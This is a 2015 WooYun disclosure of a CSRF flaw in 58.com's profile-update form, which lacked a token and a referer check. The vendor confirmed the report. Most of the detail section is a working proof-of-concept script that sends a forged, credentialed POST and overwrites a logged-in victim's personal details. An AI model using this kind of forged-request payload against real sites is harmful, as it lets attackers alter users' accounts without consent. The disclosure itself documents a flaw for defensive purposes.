当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136770

漏洞标题:58同城存在csrf可修改用户个人信息

相关厂商:58同城

漏洞作者: 番茄师傅

提交时间:2015-09-01 15:38

修复时间:2015-10-17 16:58

公开时间:2015-10-17 16:58

漏洞类型:CSRF

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-02: 厂商已经确认,细节仅向厂商公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

58同城存在csrf可修改用户个人信息

详细说明:

修改个人信息处没有加token,也未验证refer 导致csrf

1.png


构造poc

poc地址 http://xss.gift/58csrf.html


<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://my.58.com/submit/userdata/?sys=my", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryALghzlG7Rbu5ZzZ6");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"fileUploadInput\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"backFunction\"\r\n" +
"\r\n" +
"uploadresult\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"txtPhone\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"txtQQ\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"txtTrueName\"\r\n" +
"\r\n" +
"\xe9\x99\x88\xe9\xa3\x9e\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"rbsex\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"yeardate1\"\r\n" +
"\r\n" +
"1980\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"monthdate1\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"daydate1\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"select_citylocal1\"\r\n" +
"\r\n" +
"222\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"select_arealocal1\"\r\n" +
"\r\n" +
"224\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"select_namelocal1\"\r\n" +
"\r\n" +
"5186\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"txtAreola\"\r\n" +
"\r\n" +
"\xe9\x99\x88\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"txtAddress\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"txtPostZip\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"txtManse\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"hometown\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6\r\n" +
"Content-Disposition: form-data; name=\"txtSignContent\"\r\n" +
"\r\n" +
"777777777777777777777777777\r\n" +
"------WebKitFormBoundaryALghzlG7Rbu5ZzZ6--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>


poc地址 http://xss.gift/58csrf.html


访问前 :

2.png


访问后

3.png


漏洞证明:

poc地址 http://xss.gift/58csrf.html


访问前 :

2.png


访问后

3.png


修复方案:

你们有司马大牛
据说加一句给司马大牛加薪会有高rank和礼物 是吗?

版权声明:转载请注明来源 番茄师傅@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-02 16:57

厂商回复:

感谢提交,会尽快修复处理!

最新状态:

暂无


漏洞评价:

评论